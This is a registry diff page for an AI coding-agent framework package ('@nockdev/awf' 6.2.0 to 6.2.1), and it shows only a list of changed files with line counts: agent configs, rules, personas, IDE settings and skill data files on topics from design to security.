@nockdev/awf 6.2.0 → 6.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (709) hide show
  1. package/.agent/build.yaml +3 -3
  2. package/.agent/config.yaml +21 -146
  3. package/.agent/core/AGENT_BEHAVIOR.md +86 -0
  4. package/.agent/core/AUDIT_POLICY.md +1 -1
  5. package/.agent/core/CACHE.md +1 -1
  6. package/.agent/core/COMMANDS.md +16 -7
  7. package/.agent/core/CUSTOMIZE.md +61 -3
  8. package/.agent/core/DATA_SAFETY.md +1 -1
  9. package/.agent/core/MEMORY_PATHS.yaml +2 -2
  10. package/.agent/core/PERMISSIONS.md +1 -1
  11. package/.agent/core/README.md +1 -1
  12. package/.agent/core/VERSION.yaml +18 -8
  13. package/.agent/core/{ACTIVE_MEMORY.yaml → archive/ACTIVE_MEMORY.yaml} +2 -2
  14. package/.agent/core/{CHECKPOINT.yaml → archive/CHECKPOINT.yaml} +2 -2
  15. package/.agent/core/{CLEANUP_ENGINE.yaml → archive/CLEANUP_ENGINE.yaml} +2 -2
  16. package/.agent/core/{CONTEXT_INJECTOR.yaml → archive/CONTEXT_INJECTOR.yaml} +2 -2
  17. package/.agent/core/{CONTEXT_LOADER.yaml → archive/CONTEXT_LOADER.yaml} +1 -1
  18. package/.agent/core/{CONTEXT_OPTIMIZATION.yaml → archive/CONTEXT_OPTIMIZATION.yaml} +1 -1
  19. package/.agent/core/{CONTEXT_PRIORITY.yaml → archive/CONTEXT_PRIORITY.yaml} +2 -2
  20. package/.agent/core/{FLOW_ENGINE.yaml → archive/FLOW_ENGINE.yaml} +1 -1
  21. package/.agent/core/{GRAPH_MEMORY.yaml → archive/GRAPH_MEMORY.yaml} +1 -1
  22. package/.agent/core/{HYBRID_ROUTER.yaml → archive/HYBRID_ROUTER.yaml} +1 -1
  23. package/.agent/core/{INTENT_DETECTION.yaml → archive/INTENT_DETECTION.yaml} +1 -1
  24. package/.agent/core/{MEMORY_CONSOLIDATION.yaml → archive/MEMORY_CONSOLIDATION.yaml} +3 -3
  25. package/.agent/core/{MEMORY_ENGINE.yaml → archive/MEMORY_ENGINE.yaml} +2 -2
  26. package/.agent/core/{MEMORY_UTILS.yaml → archive/MEMORY_UTILS.yaml} +1 -1
  27. package/.agent/core/{REFLECTION_ENGINE.yaml → archive/REFLECTION_ENGINE.yaml} +1 -1
  28. package/.agent/core/{ROUTER.yaml → archive/ROUTER.yaml} +5 -5
  29. package/.agent/core/{SCORING_FORMULA.yaml → archive/SCORING_FORMULA.yaml} +2 -2
  30. package/.agent/core/{SEMANTIC_ENGINE.yaml → archive/SEMANTIC_ENGINE.yaml} +1 -1
  31. package/.agent/core/{SKILLS_FLOW.yaml → archive/SKILLS_FLOW.yaml} +2 -2
  32. package/.agent/core/{STATE_MACHINE.yaml → archive/STATE_MACHINE.yaml} +1 -1
  33. package/.agent/core/{SUMMARIZATION_ENGINE.yaml → archive/SUMMARIZATION_ENGINE.yaml} +2 -2
  34. package/.agent/core/{TOKEN_BUDGETS.yaml → archive/TOKEN_BUDGETS.yaml} +2 -2
  35. package/.agent/core/{TOKEN_LOADING.yaml → archive/TOKEN_LOADING.yaml} +2 -2
  36. package/.agent/core/{TOKEN_SUMMARY.yaml → archive/TOKEN_SUMMARY.yaml} +2 -2
  37. package/.agent/core/{CODING_STYLES.yaml → reference/CODING_STYLES.yaml} +1 -1
  38. package/.agent/core/{LIBRARY_REGISTRY.yaml → reference/LIBRARY_REGISTRY.yaml} +1 -1
  39. package/.agent/core/{MCP_TOOLS.yaml → reference/MCP_TOOLS.yaml} +2 -2
  40. package/.agent/core/{PATTERNS.yaml → reference/PATTERNS.yaml} +1 -1
  41. package/.agent/core/{SKILL_SCHEMA.yaml → reference/SKILL_SCHEMA.yaml} +2 -2
  42. package/.agent/i18n/en.yaml +6 -6
  43. package/.agent/i18n/vi.yaml +6 -6
  44. package/.agent/ide/README.md +1 -1
  45. package/.agent/ide/amazonq.json +3 -3
  46. package/.agent/ide/amp.json +4 -3
  47. package/.agent/ide/antigravity.json +4 -3
  48. package/.agent/ide/augment.json +4 -4
  49. package/.agent/ide/claude.json +4 -3
  50. package/.agent/ide/cline.json +4 -3
  51. package/.agent/ide/codex.json +6 -1
  52. package/.agent/ide/cody.json +4 -3
  53. package/.agent/ide/continue.json +4 -3
  54. package/.agent/ide/cursor.json +4 -3
  55. package/.agent/ide/gemini.json +4 -3
  56. package/.agent/ide/jetbrains.json +4 -3
  57. package/.agent/ide/kiro.json +4 -3
  58. package/.agent/ide/opencode.json +4 -3
  59. package/.agent/ide/roo.json +4 -3
  60. package/.agent/ide/tabnine.json +4 -3
  61. package/.agent/ide/trae.json +4 -3
  62. package/.agent/ide/vscode.json +4 -3
  63. package/.agent/ide/windsurf.json +4 -3
  64. package/.agent/ide/zed.json +4 -3
  65. package/.agent/manifest.yaml +142 -34
  66. package/.agent/memory/core_memory/persona.json +2 -2
  67. package/.agent/memory/core_memory/project.json +1 -1
  68. package/.agent/memory/core_memory/rules.json +1 -1
  69. package/.agent/memory/core_memory/user.json +1 -1
  70. package/.agent/memory/graph/knowledge_graph.json +1 -1
  71. package/.agent/memory/patterns/errors.json +1 -1
  72. package/.agent/memory/patterns/successes.json +1 -1
  73. package/.agent/memory/state.json +3 -3
  74. package/.agent/personas/README.md +1 -1
  75. package/.agent/personas/architect.md +1 -1
  76. package/.agent/personas/auditor.md +1 -1
  77. package/.agent/personas/debugger.md +1 -1
  78. package/.agent/personas/developer.md +1 -1
  79. package/.agent/personas/devops.md +1 -1
  80. package/.agent/personas/documenter.md +1 -1
  81. package/.agent/personas/orchestrator.md +1 -1
  82. package/.agent/personas/persona.schema.yaml +1 -1
  83. package/.agent/personas/planner.md +1 -1
  84. package/.agent/personas/researcher.md +1 -1
  85. package/.agent/personas/security.md +1 -1
  86. package/.agent/personas/tester.md +1 -1
  87. package/.agent/private/README.md +74 -0
  88. package/.agent/private/_index.yaml +23 -0
  89. package/.agent/private/_template/META.yaml +38 -0
  90. package/.agent/private/_template/SKILL.md +43 -0
  91. package/.agent/private/_template/data/.gitkeep +0 -0
  92. package/.agent/private/autodomyh-api/META.yaml +48 -0
  93. package/.agent/private/autodomyh-api/SKILL.md +141 -0
  94. package/.agent/private/autodomyh-api/data/conventions.yaml +107 -0
  95. package/.agent/rules/README.md +24 -18
  96. package/.agent/rules/SACRED_RULES.xml +42 -36
  97. package/.agent/rules/{constitutional → archive/constitutional}/tier-0-core.yaml +5 -5
  98. package/.agent/rules/{constitutional → archive/constitutional}/tier-1-safety.yaml +5 -5
  99. package/.agent/rules/{constitutional → archive/constitutional}/tier-2-execution.yaml +6 -6
  100. package/.agent/rules/{modules → archive}/context-management.yaml +1 -1
  101. package/.agent/rules/{duplication-prevention.md → archive/duplication-prevention.md} +1 -1
  102. package/.agent/rules/{modules → archive}/evidence.yaml +1 -1
  103. package/.agent/rules/{project-detection.md → archive/project-detection.md} +1 -1
  104. package/.agent/rules/{modules → archive}/reflection.yaml +1 -1
  105. package/.agent/rules/{modules → archive}/versioning.yaml +3 -3
  106. package/.agent/rules/data/build-systems.yaml +2 -2
  107. package/.agent/rules/modules/agent-delegation.yaml +136 -0
  108. package/.agent/rules/modules/edit-verification.yaml +1 -1
  109. package/.agent/rules/modules/git-workflow.yaml +1 -1
  110. package/.agent/rules/modules/language.yaml +1 -1
  111. package/.agent/rules/modules/online-research.yaml +1 -1
  112. package/.agent/rules/modules/performance-optimization.yaml +141 -0
  113. package/.agent/rules/modules/quality.yaml +1 -1
  114. package/.agent/rules/modules/stop-conditions.yaml +1 -1
  115. package/.agent/rules/modules/terminal-safety.yaml +1 -1
  116. package/.agent/rules/modules/yagni.yaml +1 -1
  117. package/.agent/rules/validation-framework.md +1 -1
  118. package/.agent/skills/DEVELOPMENT.yaml +5 -5
  119. package/.agent/skills/README.md +19 -16
  120. package/.agent/skills/_categories.yaml +60 -8
  121. package/.agent/skills/_router.yaml +61 -19
  122. package/.agent/skills/ai-ml/ai-agents/META.yaml +127 -0
  123. package/.agent/skills/ai-ml/ai-agents/SKILL.md +139 -0
  124. package/.agent/skills/ai-ml/ai-agents/data/agent-rules.yaml +120 -0
  125. package/.agent/skills/ai-ml/ai-agents/data/llm-integration.yaml +129 -0
  126. package/.agent/skills/ai-ml/ai-agents/data/memory-patterns.yaml +123 -0
  127. package/.agent/skills/ai-ml/ai-agents/data/orchestration-patterns.yaml +101 -0
  128. package/.agent/skills/ai-ml/gemini-live/META.yaml +55 -0
  129. package/.agent/skills/ai-ml/gemini-live/SKILL.md +155 -0
  130. package/.agent/skills/ai-ml/gemini-live/data/code-execution.yaml +131 -0
  131. package/.agent/skills/ai-ml/gemini-live/data/context-caching.yaml +96 -0
  132. package/.agent/skills/ai-ml/gemini-live/data/grounding.yaml +97 -0
  133. package/.agent/skills/ai-ml/gemini-live/data/live-api.yaml +103 -0
  134. package/.agent/skills/ai-ml/gemini-media-gen/META.yaml +56 -0
  135. package/.agent/skills/ai-ml/gemini-media-gen/SKILL.md +128 -0
  136. package/.agent/skills/ai-ml/gemini-media-gen/data/files-api.yaml +96 -0
  137. package/.agent/skills/ai-ml/gemini-media-gen/data/image-models.yaml +112 -0
  138. package/.agent/skills/ai-ml/gemini-media-gen/data/image-prompts.yaml +131 -0
  139. package/.agent/skills/ai-ml/gemini-media-gen/data/video-generation.yaml +131 -0
  140. package/.agent/skills/ai-ml/gemini-tts/META.yaml +49 -0
  141. package/.agent/skills/ai-ml/gemini-tts/SKILL.md +124 -0
  142. package/.agent/skills/ai-ml/gemini-tts/data/markup-tags.yaml +95 -0
  143. package/.agent/skills/ai-ml/gemini-tts/data/models.yaml +124 -0
  144. package/.agent/skills/ai-ml/gemini-tts/data/prompting-patterns.yaml +81 -0
  145. package/.agent/skills/ai-ml/prompt-engineering/META.yaml +77 -0
  146. package/.agent/skills/ai-ml/prompt-engineering/SKILL.md +217 -0
  147. package/.agent/skills/ai-ml/prompt-engineering/data/gemini3-patterns.yaml +170 -0
  148. package/.agent/skills/ai-ml/prompt-engineering/data/output-patterns.yaml +73 -0
  149. package/.agent/skills/ai-ml/prompt-engineering/data/provider-patterns.yaml +82 -0
  150. package/.agent/skills/ai-ml/prompt-engineering/data/reasoning-patterns.yaml +86 -0
  151. package/.agent/skills/ai-ml/prompt-engineering/data/safety-patterns.yaml +71 -0
  152. package/.agent/skills/ai-ml/prompt-engineering/data/tool-patterns.yaml +173 -0
  153. package/.agent/skills/ai-ml/rag-patterns/META.yaml +57 -0
  154. package/.agent/skills/ai-ml/rag-patterns/SKILL.md +92 -0
  155. package/.agent/skills/ai-ml/rag-patterns/data/chunking-strategies.yaml +71 -0
  156. package/.agent/skills/ai-ml/rag-patterns/data/embedding-models.yaml +76 -0
  157. package/.agent/skills/ai-ml/rag-patterns/data/evaluation.yaml +92 -0
  158. package/.agent/skills/ai-ml/rag-patterns/data/retrieval-patterns.yaml +101 -0
  159. package/.agent/skills/ai-ml/rag-patterns/data/vector-databases.yaml +103 -0
  160. package/.agent/skills/ai-ml/vector-search/META.yaml +63 -0
  161. package/.agent/skills/ai-ml/vector-search/SKILL.md +110 -0
  162. package/.agent/skills/ai-ml/vector-search/data/embedding-models.yaml +117 -0
  163. package/.agent/skills/ai-ml/vector-search/data/search-patterns.yaml +118 -0
  164. package/.agent/skills/ai-ml/vector-search/data/vector-dbs.yaml +155 -0
  165. package/.agent/skills/core/api-design/META.yaml +1 -5
  166. package/.agent/skills/core/api-design/SKILL.md +20 -26
  167. package/.agent/skills/core/api-design/data/api-versioning.yaml +211 -211
  168. package/.agent/skills/core/api-design/data/error-responses.yaml +129 -129
  169. package/.agent/skills/core/api-design/data/graphql-patterns.yaml +159 -159
  170. package/.agent/skills/core/api-design/data/grpc-patterns.yaml +159 -159
  171. package/.agent/skills/core/api-design/data/http-status-codes.yaml +170 -170
  172. package/.agent/skills/core/api-design/data/modern-api-patterns.yaml +160 -0
  173. package/.agent/skills/core/api-design/data/pagination.yaml +115 -115
  174. package/.agent/skills/core/api-design/data/rate-limiting.yaml +129 -129
  175. package/.agent/skills/core/api-design/data/rest-patterns.yaml +189 -189
  176. package/.agent/skills/core/api-design/data/test-apis.yaml +211 -211
  177. package/.agent/skills/core/authentication/META.yaml +1 -5
  178. package/.agent/skills/core/authentication/SKILL.md +36 -43
  179. package/.agent/skills/core/authentication/data/anti-patterns.yaml +129 -129
  180. package/.agent/skills/core/authentication/data/core-patterns.yaml +250 -250
  181. package/.agent/skills/core/authentication/data/jwt-patterns.yaml +249 -249
  182. package/.agent/skills/core/authentication/data/language-csharp.yaml +209 -209
  183. package/.agent/skills/core/authentication/data/language-go.yaml +209 -209
  184. package/.agent/skills/core/authentication/data/language-java.yaml +209 -209
  185. package/.agent/skills/core/authentication/data/language-mobile.yaml +209 -209
  186. package/.agent/skills/core/authentication/data/language-python.yaml +209 -209
  187. package/.agent/skills/core/authentication/data/language-rust.yaml +209 -209
  188. package/.agent/skills/core/authentication/data/language-typescript.yaml +209 -209
  189. package/.agent/skills/core/authentication/data/mfa-patterns.yaml +169 -169
  190. package/.agent/skills/core/authentication/data/oauth-patterns.yaml +249 -249
  191. package/.agent/skills/core/authentication/data/oauth.yaml +243 -243
  192. package/.agent/skills/core/authentication/data/passkey-patterns.yaml +149 -0
  193. package/.agent/skills/core/authentication/data/passkeys-webauthn.yaml +209 -209
  194. package/.agent/skills/core/authentication/data/passkeys.yaml +203 -203
  195. package/.agent/skills/core/authentication/data/password-patterns.yaml +169 -169
  196. package/.agent/skills/core/authentication/data/password.yaml +163 -163
  197. package/.agent/skills/core/authentication/data/session-patterns.yaml +209 -209
  198. package/.agent/skills/core/error-handling/META.yaml +1 -5
  199. package/.agent/skills/core/error-handling/SKILL.md +21 -25
  200. package/.agent/skills/core/error-handling/data/anti-patterns.yaml +99 -99
  201. package/.agent/skills/core/error-handling/data/api-error-patterns.yaml +2 -2
  202. package/.agent/skills/core/error-handling/data/core-patterns.yaml +2 -2
  203. package/.agent/skills/core/error-handling/data/error-codes.yaml +159 -159
  204. package/.agent/skills/core/error-handling/data/error-messages.yaml +2 -2
  205. package/.agent/skills/core/error-handling/data/language-c-cpp.yaml +220 -220
  206. package/.agent/skills/core/error-handling/data/language-go-rust.yaml +2 -2
  207. package/.agent/skills/core/error-handling/data/language-python-java.yaml +220 -220
  208. package/.agent/skills/core/error-handling/data/language-swift-kotlin.yaml +220 -220
  209. package/.agent/skills/core/error-handling/data/language-typescript-php-ruby.yaml +220 -220
  210. package/.agent/skills/core/error-handling/data/resilience-patterns.yaml +2 -2
  211. package/.agent/skills/core/error-handling/data/ui-error-patterns.yaml +129 -129
  212. package/.agent/skills/core/logging/META.yaml +1 -5
  213. package/.agent/skills/core/logging/SKILL.md +28 -42
  214. package/.agent/skills/core/logging/data/aggregation-patterns.yaml +185 -185
  215. package/.agent/skills/core/logging/data/anti-patterns.yaml +115 -115
  216. package/.agent/skills/core/logging/data/core-patterns.yaml +220 -220
  217. package/.agent/skills/core/logging/data/language-csharp.yaml +185 -185
  218. package/.agent/skills/core/logging/data/language-go.yaml +185 -185
  219. package/.agent/skills/core/logging/data/language-java.yaml +185 -185
  220. package/.agent/skills/core/logging/data/language-kotlin.yaml +150 -150
  221. package/.agent/skills/core/logging/data/language-others.yaml +178 -178
  222. package/.agent/skills/core/logging/data/language-python.yaml +185 -185
  223. package/.agent/skills/core/logging/data/language-rust.yaml +185 -185
  224. package/.agent/skills/core/logging/data/language-swift.yaml +150 -150
  225. package/.agent/skills/core/logging/data/language-typescript.yaml +185 -185
  226. package/.agent/skills/core/logging/data/otel-logging.yaml +150 -150
  227. package/.agent/skills/core/observability/META.yaml +1 -5
  228. package/.agent/skills/core/observability/SKILL.md +29 -38
  229. package/.agent/skills/core/observability/data/alerting-patterns.yaml +159 -159
  230. package/.agent/skills/core/observability/data/anti-patterns.yaml +99 -99
  231. package/.agent/skills/core/observability/data/core-patterns.yaml +189 -189
  232. package/.agent/skills/core/observability/data/language-cpp.yaml +159 -159
  233. package/.agent/skills/core/observability/data/language-csharp.yaml +159 -159
  234. package/.agent/skills/core/observability/data/language-go.yaml +159 -159
  235. package/.agent/skills/core/observability/data/language-java.yaml +159 -159
  236. package/.agent/skills/core/observability/data/language-others.yaml +249 -249
  237. package/.agent/skills/core/observability/data/language-python.yaml +159 -159
  238. package/.agent/skills/core/observability/data/language-rust.yaml +159 -159
  239. package/.agent/skills/core/observability/data/language-typescript.yaml +159 -159
  240. package/.agent/skills/core/observability/data/metrics-patterns.yaml +129 -129
  241. package/.agent/skills/core/observability/data/metrics-prometheus.yaml +159 -159
  242. package/.agent/skills/core/observability/data/otel-core.yaml +189 -189
  243. package/.agent/skills/core/observability/data/profiling-patterns.yaml +129 -129
  244. package/.agent/skills/core/observability/data/tracing-patterns.yaml +159 -159
  245. package/.agent/skills/core/observability/data/tracing-tools.yaml +129 -129
  246. package/.agent/skills/core/security/META.yaml +1 -5
  247. package/.agent/skills/core/security/SKILL.md +25 -25
  248. package/.agent/skills/core/security/data/ai-ml-security.yaml +255 -255
  249. package/.agent/skills/core/security/data/api-security.yaml +224 -224
  250. package/.agent/skills/core/security/data/auth-patterns.yaml +189 -189
  251. package/.agent/skills/core/security/data/binary-exploitation.yaml +333 -333
  252. package/.agent/skills/core/security/data/cloud-security.yaml +263 -263
  253. package/.agent/skills/core/security/data/cwe-top25.yaml +409 -409
  254. package/.agent/skills/core/security/data/language-specific/c-security.yaml +289 -289
  255. package/.agent/skills/core/security/data/language-specific/cpp-security.yaml +289 -289
  256. package/.agent/skills/core/security/data/language-specific/csharp-security.yaml +213 -213
  257. package/.agent/skills/core/security/data/language-specific/go-security.yaml +213 -213
  258. package/.agent/skills/core/security/data/language-specific/java-security.yaml +289 -289
  259. package/.agent/skills/core/security/data/language-specific/kotlin-security.yaml +192 -192
  260. package/.agent/skills/core/security/data/language-specific/php-security.yaml +213 -213
  261. package/.agent/skills/core/security/data/language-specific/python-security.yaml +289 -289
  262. package/.agent/skills/core/security/data/language-specific/ruby-security.yaml +192 -192
  263. package/.agent/skills/core/security/data/language-specific/rust-security.yaml +234 -234
  264. package/.agent/skills/core/security/data/language-specific/solidity-security.yaml +363 -363
  265. package/.agent/skills/core/security/data/language-specific/swift-security.yaml +192 -192
  266. package/.agent/skills/core/security/data/language-specific/typescript-security.yaml +289 -289
  267. package/.agent/skills/core/security/data/mobile-security.yaml +363 -363
  268. package/.agent/skills/core/security/data/network-security.yaml +291 -291
  269. package/.agent/skills/core/security/data/owasp-llm-top10.yaml +122 -0
  270. package/.agent/skills/core/security/data/owasp-top10.yaml +165 -165
  271. package/.agent/skills/core/security/data/reverse-engineering.yaml +491 -491
  272. package/.agent/skills/core/security/data/supply-chain.yaml +213 -213
  273. package/.agent/skills/cross-cutting/_index.yaml +4 -2
  274. package/.agent/skills/cross-cutting/accessibility/META.yaml +45 -0
  275. package/.agent/skills/cross-cutting/accessibility/SKILL.md +121 -0
  276. package/.agent/skills/cross-cutting/accessibility/data/aria-patterns.yaml +88 -0
  277. package/.agent/skills/cross-cutting/accessibility/data/testing-tools.yaml +60 -0
  278. package/.agent/skills/cross-cutting/accessibility/data/wcag-guidelines.yaml +98 -0
  279. package/.agent/skills/cross-cutting/audit-pro/META.yaml +2 -6
  280. package/.agent/skills/cross-cutting/bun/META.yaml +2 -8
  281. package/.agent/skills/cross-cutting/bun/SKILL.md +8 -12
  282. package/.agent/skills/cross-cutting/coding-rules/META.yaml +4 -11
  283. package/.agent/skills/cross-cutting/coding-rules/SKILL.md +38 -46
  284. package/.agent/skills/cross-cutting/coding-rules/data/adr-patterns.yaml +102 -0
  285. package/.agent/skills/cross-cutting/coding-rules/data/architecture-patterns.yaml +289 -90
  286. package/.agent/skills/cross-cutting/coding-rules/data/build-systems.yaml +340 -340
  287. package/.agent/skills/cross-cutting/coding-rules/data/coding-rules.yaml +641 -641
  288. package/.agent/skills/cross-cutting/coding-rules/data/concurrency-patterns.yaml +102 -102
  289. package/.agent/skills/cross-cutting/coding-rules/data/design-patterns.yaml +254 -254
  290. package/.agent/skills/cross-cutting/coding-rules/data/framework-directories.yaml +446 -0
  291. package/.agent/skills/cross-cutting/coding-rules/data/framework-signatures.yaml +338 -338
  292. package/.agent/skills/cross-cutting/coding-rules/data/memory-management.yaml +102 -102
  293. package/.agent/skills/cross-cutting/coding-rules/data/naming-conventions.yaml +314 -314
  294. package/.agent/skills/cross-cutting/coding-rules/data/performance-benchmarks.yaml +158 -158
  295. package/.agent/skills/cross-cutting/coding-rules/data/solid-principles.yaml +74 -74
  296. package/.agent/skills/cross-cutting/coding-rules/data/test-frameworks.yaml +177 -177
  297. package/.agent/skills/cross-cutting/database/META.yaml +2 -2
  298. package/.agent/skills/cross-cutting/database/SKILL.md +10 -19
  299. package/.agent/skills/cross-cutting/deno/META.yaml +2 -8
  300. package/.agent/skills/cross-cutting/deno/SKILL.md +8 -12
  301. package/.agent/skills/cross-cutting/domyh-design/ADVANCED.md +247 -0
  302. package/.agent/skills/cross-cutting/{ui-ux-pro-max → domyh-design}/META.yaml +44 -13
  303. package/.agent/skills/cross-cutting/domyh-design/SKILL.md +171 -0
  304. package/.agent/skills/cross-cutting/domyh-design/data/animation-ui-kits.yaml +198 -0
  305. package/.agent/skills/cross-cutting/domyh-design/data/charts.yaml +331 -0
  306. package/.agent/skills/cross-cutting/domyh-design/data/colors.yaml +1226 -0
  307. package/.agent/skills/cross-cutting/domyh-design/data/component-decision.yaml +287 -0
  308. package/.agent/skills/cross-cutting/domyh-design/data/component-effects.yaml +673 -0
  309. package/.agent/skills/cross-cutting/domyh-design/data/component-mapping.yaml +318 -0
  310. package/.agent/skills/cross-cutting/domyh-design/data/design-system-prompts.yaml +174 -0
  311. package/.agent/skills/cross-cutting/domyh-design/data/design-tokens.yaml +525 -0
  312. package/.agent/skills/cross-cutting/domyh-design/data/desktop-animation.yaml +680 -0
  313. package/.agent/skills/cross-cutting/domyh-design/data/desktop-architecture.yaml +140 -0
  314. package/.agent/skills/cross-cutting/{ui-ux-pro-max → domyh-design}/data/desktop-colors.yaml +4 -4
  315. package/.agent/skills/cross-cutting/domyh-design/data/directory-structure.yaml +80 -0
  316. package/.agent/skills/cross-cutting/domyh-design/data/icons.yaml +918 -0
  317. package/.agent/skills/cross-cutting/domyh-design/data/image-gen-prompts.yaml +678 -0
  318. package/.agent/skills/cross-cutting/domyh-design/data/image-gen-workflows.yaml +202 -0
  319. package/.agent/skills/cross-cutting/domyh-design/data/implementation-strategy.yaml +107 -0
  320. package/.agent/skills/cross-cutting/domyh-design/data/landing.yaml +373 -0
  321. package/.agent/skills/cross-cutting/domyh-design/data/micro-interactions.yaml +528 -0
  322. package/.agent/skills/cross-cutting/domyh-design/data/platform-frameworks.yaml +195 -0
  323. package/.agent/skills/cross-cutting/domyh-design/data/platform-guidelines.yaml +177 -0
  324. package/.agent/skills/cross-cutting/domyh-design/data/products.yaml +1339 -0
  325. package/.agent/skills/cross-cutting/domyh-design/data/prompts.yaml +207 -0
  326. package/.agent/skills/cross-cutting/domyh-design/data/react-performance.yaml +504 -0
  327. package/.agent/skills/cross-cutting/domyh-design/data/scroll-animation-patterns.yaml +398 -0
  328. package/.agent/skills/cross-cutting/domyh-design/data/stacks/desktop.yaml +228 -0
  329. package/.agent/skills/cross-cutting/domyh-design/data/stacks/flutter.yaml +508 -0
  330. package/.agent/skills/cross-cutting/domyh-design/data/stacks/html-tailwind.yaml +543 -0
  331. package/.agent/skills/cross-cutting/domyh-design/data/stacks/nextjs.yaml +515 -0
  332. package/.agent/skills/cross-cutting/domyh-design/data/stacks/nuxt-ui.yaml +519 -0
  333. package/.agent/skills/cross-cutting/domyh-design/data/stacks/nuxtjs.yaml +599 -0
  334. package/.agent/skills/cross-cutting/domyh-design/data/stacks/react-native.yaml +496 -0
  335. package/.agent/skills/cross-cutting/domyh-design/data/stacks/react.yaml +526 -0
  336. package/.agent/skills/cross-cutting/domyh-design/data/stacks/shadcn.yaml +616 -0
  337. package/.agent/skills/cross-cutting/domyh-design/data/stacks/svelte.yaml +520 -0
  338. package/.agent/skills/cross-cutting/domyh-design/data/stacks/swiftui.yaml +486 -0
  339. package/.agent/skills/cross-cutting/domyh-design/data/stacks/vue.yaml +485 -0
  340. package/.agent/skills/cross-cutting/domyh-design/data/styles.yaml +1473 -0
  341. package/.agent/skills/cross-cutting/domyh-design/data/tailwind-animation-plugins.yaml +462 -0
  342. package/.agent/skills/cross-cutting/domyh-design/data/typography.yaml +647 -0
  343. package/.agent/skills/cross-cutting/domyh-design/data/ui-reasoning.yaml +1019 -0
  344. package/.agent/skills/cross-cutting/domyh-design/data/ux-guidelines.yaml +1009 -0
  345. package/.agent/skills/cross-cutting/domyh-design/data/web-animation-libraries.yaml +541 -0
  346. package/.agent/skills/cross-cutting/domyh-design/data/web-interface.yaml +347 -0
  347. package/.agent/skills/cross-cutting/domyh-design/data/webview-animation-optimization.yaml +685 -0
  348. package/.agent/skills/cross-cutting/electron/SKILL.md +10 -14
  349. package/.agent/skills/cross-cutting/event-driven/META.yaml +108 -0
  350. package/.agent/skills/cross-cutting/event-driven/SKILL.md +123 -0
  351. package/.agent/skills/cross-cutting/event-driven/data/broker-comparison.yaml +123 -0
  352. package/.agent/skills/cross-cutting/event-driven/data/eda-patterns.yaml +120 -0
  353. package/.agent/skills/cross-cutting/event-driven/data/production-patterns.yaml +120 -0
  354. package/.agent/skills/cross-cutting/microservices/META.yaml +90 -0
  355. package/.agent/skills/cross-cutting/microservices/SKILL.md +120 -0
  356. package/.agent/skills/cross-cutting/microservices/data/communication.yaml +163 -0
  357. package/.agent/skills/cross-cutting/microservices/data/cqrs-patterns.yaml +199 -0
  358. package/.agent/skills/cross-cutting/microservices/data/deployment.yaml +153 -0
  359. package/.agent/skills/cross-cutting/microservices/data/event-sourcing.yaml +231 -0
  360. package/.agent/skills/cross-cutting/microservices/data/observability.yaml +152 -0
  361. package/.agent/skills/cross-cutting/microservices/data/resilience.yaml +189 -0
  362. package/.agent/skills/cross-cutting/microservices/data/saga-patterns.yaml +161 -0
  363. package/.agent/skills/cross-cutting/microservices/data/service-mesh.yaml +179 -0
  364. package/.agent/skills/cross-cutting/monorepo/META.yaml +54 -0
  365. package/.agent/skills/cross-cutting/monorepo/SKILL.md +108 -0
  366. package/.agent/skills/cross-cutting/monorepo/data/ci-cd-strategies.yaml +74 -0
  367. package/.agent/skills/cross-cutting/monorepo/data/nx-patterns.yaml +74 -0
  368. package/.agent/skills/cross-cutting/monorepo/data/turborepo-patterns.yaml +84 -0
  369. package/.agent/skills/cross-cutting/monorepo/data/versioning.yaml +83 -0
  370. package/.agent/skills/cross-cutting/monorepo/data/workspace-patterns.yaml +85 -0
  371. package/.agent/skills/cross-cutting/playwright/ADVANCED.md +289 -0
  372. package/.agent/skills/cross-cutting/playwright/META.yaml +90 -0
  373. package/.agent/skills/cross-cutting/playwright/SKILL.md +210 -0
  374. package/.agent/skills/cross-cutting/playwright/data/ai-agents.yaml +137 -0
  375. package/.agent/skills/cross-cutting/playwright/data/config-templates.yaml +141 -0
  376. package/.agent/skills/cross-cutting/playwright/data/interaction-checklist.yaml +398 -0
  377. package/.agent/skills/cross-cutting/playwright/data/locator-patterns.yaml +96 -0
  378. package/.agent/skills/cross-cutting/playwright/data/mcp-tools.yaml +153 -0
  379. package/.agent/skills/cross-cutting/playwright/data/open-source-tools.yaml +95 -0
  380. package/.agent/skills/cross-cutting/real-time/META.yaml +72 -0
  381. package/.agent/skills/cross-cutting/real-time/SKILL.md +128 -0
  382. package/.agent/skills/cross-cutting/real-time/data/socketio-patterns.yaml +165 -0
  383. package/.agent/skills/cross-cutting/real-time/data/sse-patterns.yaml +181 -0
  384. package/.agent/skills/cross-cutting/real-time/data/websocket-patterns.yaml +176 -0
  385. package/.agent/skills/cross-cutting/seo/META.yaml +47 -0
  386. package/.agent/skills/cross-cutting/seo/SKILL.md +114 -0
  387. package/.agent/skills/cross-cutting/seo/data/core-web-vitals.yaml +93 -0
  388. package/.agent/skills/cross-cutting/seo/data/structured-data.yaml +82 -0
  389. package/.agent/skills/cross-cutting/seo/data/technical-seo.yaml +75 -0
  390. package/.agent/skills/cross-cutting/sql/META.yaml +2 -8
  391. package/.agent/skills/cross-cutting/sql/SKILL.md +8 -12
  392. package/.agent/skills/cross-cutting/tailwind/META.yaml +3 -20
  393. package/.agent/skills/cross-cutting/tailwind/SKILL.md +13 -11
  394. package/.agent/skills/cross-cutting/tauri/META.yaml +75 -0
  395. package/.agent/skills/cross-cutting/tauri/SKILL.md +127 -0
  396. package/.agent/skills/cross-cutting/tauri/data/build.yaml +141 -0
  397. package/.agent/skills/cross-cutting/tauri/data/plugins.yaml +157 -0
  398. package/.agent/skills/cross-cutting/tauri/data/security.yaml +134 -0
  399. package/.agent/skills/cross-cutting/tdd-workflow/META.yaml +58 -0
  400. package/.agent/skills/cross-cutting/tdd-workflow/SKILL.md +128 -0
  401. package/.agent/skills/cross-cutting/tdd-workflow/data/anti-patterns.yaml +70 -0
  402. package/.agent/skills/cross-cutting/tdd-workflow/data/bdd-atdd-patterns.yaml +77 -0
  403. package/.agent/skills/cross-cutting/tdd-workflow/data/core-tdd-cycle.yaml +104 -0
  404. package/.agent/skills/cross-cutting/tdd-workflow/data/coverage-strategies.yaml +105 -0
  405. package/.agent/skills/cross-cutting/tdd-workflow/data/language-patterns.yaml +115 -0
  406. package/.agent/skills/cross-cutting/tdd-workflow/data/test-doubles.yaml +93 -0
  407. package/.agent/skills/cross-cutting/testing/META.yaml +1 -5
